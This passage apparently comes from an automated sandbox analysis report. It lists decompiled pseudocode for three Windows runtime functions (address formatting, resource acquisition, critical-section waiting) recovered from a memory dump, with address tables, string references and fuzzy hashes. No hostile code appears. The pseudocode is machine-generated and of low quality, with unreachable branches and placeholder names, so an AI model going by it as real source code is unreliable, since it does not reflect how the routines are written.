							_t34 = E02027707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02027707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01FF2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01FFE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                                0x020314c0
                                                                                                                                                                0x020314cb
                                                                                                                                                                0x020314d2
                                                                                                                                                                0x020314d6
                                                                                                                                                                0x020314da
                                                                                                                                                                0x020314de
                                                                                                                                                                0x020314e3
                                                                                                                                                                0x0203157a
                                                                                                                                                                0x0203157a
                                                                                                                                                                0x020314f1
                                                                                                                                                                0x020314f3
                                                                                                                                                                0x0205ea0f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ea15
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ea15
                                                                                                                                                                0x020314f9
                                                                                                                                                                0x020314f9
                                                                                                                                                                0x020314fe
                                                                                                                                                                0x02031504
                                                                                                                                                                0x0205ea1a
                                                                                                                                                                0x0205ea1f
                                                                                                                                                                0x0205ea21
                                                                                                                                                                0x0205ea22
                                                                                                                                                                0x0205ea27
                                                                                                                                                                0x0205ea2a
                                                                                                                                                                0x0205ea2a
                                                                                                                                                                0x02031515
                                                                                                                                                                0x02031517
                                                                                                                                                                0x0203156d
                                                                                                                                                                0x02031572
                                                                                                                                                                0x02031575
                                                                                                                                                                0x02031575
                                                                                                                                                                0x0203151e
                                                                                                                                                                0x0205ea50
                                                                                                                                                                0x0205ea55
                                                                                                                                                                0x0205ea58
                                                                                                                                                                0x0205ea58
                                                                                                                                                                0x0203152e
                                                                                                                                                                0x02031531
                                                                                                                                                                0x02031533
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02031535
                                                                                                                                                                0x02031541
                                                                                                                                                                0x02031549
                                                                                                                                                                0x02031549
                                                                                                                                                                0x02031533
                                                                                                                                                                0x020314f3
                                                                                                                                                                0x02031559

                                                                                                                                                                APIs
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 0205EA22
                                                                                                                                                                  • Part of subcall function 020313CB: ___swprintf_l.LIBCMT ref: 0203146B
                                                                                                                                                                  • Part of subcall function 020313CB: ___swprintf_l.LIBCMT ref: 02031490
                                                                                                                                                                • ___swprintf_l.LIBCMT ref: 0203156D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                • Opcode ID: 0bcf21b17e1d9ea9577a026ce9fced55516a63b4e7aa7f4655af7f6cd3d7a6f4
                                                                                                                                                                • Instruction ID: 441c37c4a307f4d929f168708d4e39a6cd80767cd132d6a36dfb056595d173d0
                                                                                                                                                                • Opcode Fuzzy Hash: 0bcf21b17e1d9ea9577a026ce9fced55516a63b4e7aa7f4655af7f6cd3d7a6f4
                                                                                                                                                                • Instruction Fuzzy Hash: F6218072900329DBCB62DF64CC40AEEB3ACBF58714F444556ED4AD3140DB71EA589BE1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 020153A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 45%
                                                                                                                                                                			E020153A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020d01c0;
									_push(_t92);
									_push(0);
									_t37 = E01FEF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02034FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02043F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02043F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0207217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02043F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02033915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02015384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01FEF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02033915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01FEF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02033915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01FEF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02033915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02015329(_t74, _t92);
													_push(1);
													_t48 = E020153A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                                0x020153ab
                                                                                                                                                                0x020153ae
                                                                                                                                                                0x020153b1
                                                                                                                                                                0x020153b4
                                                                                                                                                                0x020153b7
                                                                                                                                                                0x020305b6
                                                                                                                                                                0x020305c0
                                                                                                                                                                0x020305c3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020305c9
                                                                                                                                                                0x020305c9
                                                                                                                                                                0x020305cc
                                                                                                                                                                0x020305d5
                                                                                                                                                                0x020305d5
                                                                                                                                                                0x020153bd
                                                                                                                                                                0x020153bd
                                                                                                                                                                0x020153bd
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153c0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052269
                                                                                                                                                                0x0205226d
                                                                                                                                                                0x02052349
                                                                                                                                                                0x0205234d
                                                                                                                                                                0x02052273
                                                                                                                                                                0x02052276
                                                                                                                                                                0x02052279
                                                                                                                                                                0x0205227e
                                                                                                                                                                0x02052283
                                                                                                                                                                0x02052287
                                                                                                                                                                0x0205228a
                                                                                                                                                                0x0205228d
                                                                                                                                                                0x0205228f
                                                                                                                                                                0x020522bc
                                                                                                                                                                0x020522bc
                                                                                                                                                                0x020522bc
                                                                                                                                                                0x020522be
                                                                                                                                                                0x020522c4
                                                                                                                                                                0x020522cc
                                                                                                                                                                0x020522d0
                                                                                                                                                                0x020522d6
                                                                                                                                                                0x020522d7
                                                                                                                                                                0x020522da
                                                                                                                                                                0x020522df
                                                                                                                                                                0x020522e4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522e6
                                                                                                                                                                0x020522e9
                                                                                                                                                                0x020522f4
                                                                                                                                                                0x020522f9
                                                                                                                                                                0x020522fa
                                                                                                                                                                0x02052305
                                                                                                                                                                0x02052314
                                                                                                                                                                0x02052319
                                                                                                                                                                0x0205231a
                                                                                                                                                                0x0205231d
                                                                                                                                                                0x02052320
                                                                                                                                                                0x02052323
                                                                                                                                                                0x02052323
                                                                                                                                                                0x02052328
                                                                                                                                                                0x0205232d
                                                                                                                                                                0x0205232f
                                                                                                                                                                0x02052331
                                                                                                                                                                0x02052336
                                                                                                                                                                0x02052336
                                                                                                                                                                0x0205233b
                                                                                                                                                                0x0205233d
                                                                                                                                                                0x02052350
                                                                                                                                                                0x02052351
                                                                                                                                                                0x02052356
                                                                                                                                                                0x02052359
                                                                                                                                                                0x02052359
                                                                                                                                                                0x0205235b
                                                                                                                                                                0x0205235d
                                                                                                                                                                0x02015367
                                                                                                                                                                0x0201536b
                                                                                                                                                                0x02015372
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052363
                                                                                                                                                                0x02052363
                                                                                                                                                                0x02052369
                                                                                                                                                                0x0205236a
                                                                                                                                                                0x0205236c
                                                                                                                                                                0x02052371
                                                                                                                                                                0x02052373
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052379
                                                                                                                                                                0x02052379
                                                                                                                                                                0x0205237a
                                                                                                                                                                0x0205237f
                                                                                                                                                                0x0205237f
                                                                                                                                                                0x02052385
                                                                                                                                                                0x02052386
                                                                                                                                                                0x02052389
                                                                                                                                                                0x0205238e
                                                                                                                                                                0x02052390
                                                                                                                                                                0x02015378
                                                                                                                                                                0x0201537c
                                                                                                                                                                0x02052396
                                                                                                                                                                0x02052396
                                                                                                                                                                0x02052397
                                                                                                                                                                0x0205239c
                                                                                                                                                                0x020523a2
                                                                                                                                                                0x020523a3
                                                                                                                                                                0x020523a6
                                                                                                                                                                0x020523ab
                                                                                                                                                                0x020523ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020523b3
                                                                                                                                                                0x020523b3
                                                                                                                                                                0x020523b4
                                                                                                                                                                0x020523b9
                                                                                                                                                                0x020523ba
                                                                                                                                                                0x020523ba
                                                                                                                                                                0x020523bc
                                                                                                                                                                0x020523bf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049153
                                                                                                                                                                0x02049158
                                                                                                                                                                0x0204915a
                                                                                                                                                                0x0204915e
                                                                                                                                                                0x02049160
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049166
                                                                                                                                                                0x02049166
                                                                                                                                                                0x02049171
                                                                                                                                                                0x02049176
                                                                                                                                                                0x02049176
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049160
                                                                                                                                                                0x020523c6
                                                                                                                                                                0x020523cb
                                                                                                                                                                0x020523ce
                                                                                                                                                                0x020523d7
                                                                                                                                                                0x020523d7
                                                                                                                                                                0x020523ad
                                                                                                                                                                0x02052390
                                                                                                                                                                0x02052373
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x02052291
                                                                                                                                                                0x02052291
                                                                                                                                                                0x02052293
                                                                                                                                                                0x02052295
                                                                                                                                                                0x0205229a
                                                                                                                                                                0x020522a1
                                                                                                                                                                0x020522a3
                                                                                                                                                                0x020522a7
                                                                                                                                                                0x020522a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522ab
                                                                                                                                                                0x020522ad
                                                                                                                                                                0x020522af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522af
                                                                                                                                                                0x020522b1
                                                                                                                                                                0x020522b4
                                                                                                                                                                0x020522b4
                                                                                                                                                                0x020522b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522b6
                                                                                                                                                                0x0205228f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205226d
                                                                                                                                                                0x020153cb
                                                                                                                                                                0x020153ce
                                                                                                                                                                0x020153d0
                                                                                                                                                                0x020153d4
                                                                                                                                                                0x020153d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153d8
                                                                                                                                                                0x020153e3
                                                                                                                                                                0x020153ea
                                                                                                                                                                0x020153ea
                                                                                                                                                                0x020153d6
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020522F4
                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020522FC
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 02052328
                                                                                                                                                                • RTL: Resource at %p, xrefs: 0205230B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-871070163
                                                                                                                                                                • Opcode ID: 5553d0cae0cb9579649d3d345a9bc9cbdc89e289c0c4b3ab3d95231cf86056ca
                                                                                                                                                                • Instruction ID: c8c4935f417a63b26bab49d2da89a05dc3f9c91e3a3761bc7bb1384d7380e823
                                                                                                                                                                • Opcode Fuzzy Hash: 5553d0cae0cb9579649d3d345a9bc9cbdc89e289c0c4b3ab3d95231cf86056ca
                                                                                                                                                                • Instruction Fuzzy Hash: 8751E5B16017166FDB12DB29CCC0FE777E9AF94324F104269ED49DF280EB61E8419BA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0201EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                			E0201EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0200DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x20d793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01FF16C0(_t39);
				} else {
					_t40 = E01FEF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02033915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01FF01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x20d793c; // 0x0
								_push(_t85);
								_t44 = E01FF1F28(_t71);
							} else {
								_t44 = E01FEF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02033915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02072306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0201EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02034FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02043F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02043F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20d20c0;
								if(_t85 != 0x20d20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0207217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02043F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                                0x0201ec56
                                                                                                                                                                0x0201ec56
                                                                                                                                                                0x0201ec56
                                                                                                                                                                0x0201ec5c
                                                                                                                                                                0x0201ec64
                                                                                                                                                                0x020523e6
                                                                                                                                                                0x020523eb
                                                                                                                                                                0x020523eb
                                                                                                                                                                0x0201ec6a
                                                                                                                                                                0x0201ec6c
                                                                                                                                                                0x0201ec6f
                                                                                                                                                                0x020523f3
                                                                                                                                                                0x020523f8
                                                                                                                                                                0x020523fa
                                                                                                                                                                0x020523fc
                                                                                                                                                                0x0201ec75
                                                                                                                                                                0x0201ec76
                                                                                                                                                                0x0201ec76
                                                                                                                                                                0x0201ec7b
                                                                                                                                                                0x0201ec7c
                                                                                                                                                                0x0201ec7e
                                                                                                                                                                0x02052406
                                                                                                                                                                0x02052407
                                                                                                                                                                0x0205240c
                                                                                                                                                                0x0205240d
                                                                                                                                                                0x0205240d
                                                                                                                                                                0x0205240d
                                                                                                                                                                0x02052414
                                                                                                                                                                0x02052417
                                                                                                                                                                0x0205241e
                                                                                                                                                                0x02052435
                                                                                                                                                                0x02052438
                                                                                                                                                                0x0205243c
                                                                                                                                                                0x0205243f
                                                                                                                                                                0x02052442
                                                                                                                                                                0x02052443
                                                                                                                                                                0x02052446
                                                                                                                                                                0x02052449
                                                                                                                                                                0x02052453
                                                                                                                                                                0x02052455
                                                                                                                                                                0x0205245b
                                                                                                                                                                0x0205245b
                                                                                                                                                                0x0201eb99
                                                                                                                                                                0x0201eb99
                                                                                                                                                                0x0201eb9c
                                                                                                                                                                0x0201eb9d
                                                                                                                                                                0x0201eb9f
                                                                                                                                                                0x0201eba2
                                                                                                                                                                0x02052465
                                                                                                                                                                0x0205246b
                                                                                                                                                                0x0205246d
                                                                                                                                                                0x0201eba8
                                                                                                                                                                0x0201eba9
                                                                                                                                                                0x0201eba9
                                                                                                                                                                0x0201ebae
                                                                                                                                                                0x0201ebb3
                                                                                                                                                                0x0201ebb9
                                                                                                                                                                0x0201ebbb
                                                                                                                                                                0x02052513
                                                                                                                                                                0x02052514
                                                                                                                                                                0x02052519
                                                                                                                                                                0x0205251b
                                                                                                                                                                0x0201ec2a
                                                                                                                                                                0x0201ec2d
                                                                                                                                                                0x0201ec33
                                                                                                                                                                0x0201ec36
                                                                                                                                                                0x0201ec3a
                                                                                                                                                                0x0201ec3e
                                                                                                                                                                0x0201ec40
                                                                                                                                                                0x0201ec47
                                                                                                                                                                0x0201ec47
                                                                                                                                                                0x0201ec40
                                                                                                                                                                0x01ff22c6
                                                                                                                                                                0x0201ebc1
                                                                                                                                                                0x0201ebc1
                                                                                                                                                                0x0201ebc5
                                                                                                                                                                0x0201ec9a
                                                                                                                                                                0x0201ec9a
                                                                                                                                                                0x0201ebd6
                                                                                                                                                                0x0201ebd6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0201ebbb
                                                                                                                                                                0x02052477
                                                                                                                                                                0x0205247c
                                                                                                                                                                0x02052486
                                                                                                                                                                0x0205248b
                                                                                                                                                                0x02052496
                                                                                                                                                                0x0205249b
                                                                                                                                                                0x0205249d
                                                                                                                                                                0x020524a0
                                                                                                                                                                0x020524a3
                                                                                                                                                                0x020524aa
                                                                                                                                                                0x020524aa
                                                                                                                                                                0x020524a5
                                                                                                                                                                0x020524a5
                                                                                                                                                                0x020524a5
                                                                                                                                                                0x020524ac
                                                                                                                                                                0x020524af
                                                                                                                                                                0x020524b0
                                                                                                                                                                0x020524b3
                                                                                                                                                                0x020524b9
                                                                                                                                                                0x020524ba
                                                                                                                                                                0x020524bb
                                                                                                                                                                0x020524c6
                                                                                                                                                                0x020524cb
                                                                                                                                                                0x020524cd
                                                                                                                                                                0x020524d0
                                                                                                                                                                0x020524d1
                                                                                                                                                                0x020524d4
                                                                                                                                                                0x020524d6
                                                                                                                                                                0x020524d9
                                                                                                                                                                0x020524d9
                                                                                                                                                                0x020524dc
                                                                                                                                                                0x020524df
                                                                                                                                                                0x020524e1
                                                                                                                                                                0x020524e7
                                                                                                                                                                0x020524e9
                                                                                                                                                                0x020524ec
                                                                                                                                                                0x020524ef
                                                                                                                                                                0x020524f2
                                                                                                                                                                0x020524f2
                                                                                                                                                                0x020524ef
                                                                                                                                                                0x020524e7
                                                                                                                                                                0x020524fa
                                                                                                                                                                0x020524ff
                                                                                                                                                                0x02052501
                                                                                                                                                                0x02052503
                                                                                                                                                                0x02052506
                                                                                                                                                                0x0205250b
                                                                                                                                                                0x0201eb8c
                                                                                                                                                                0x0201eb93
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0201eb93
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0201eb99
                                                                                                                                                                0x0201ec85
                                                                                                                                                                0x0201ec85
                                                                                                                                                                0x0201ec85
                                                                                                                                                                0x00000000

                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020524BD
                                                                                                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0205248D
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 020524FA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
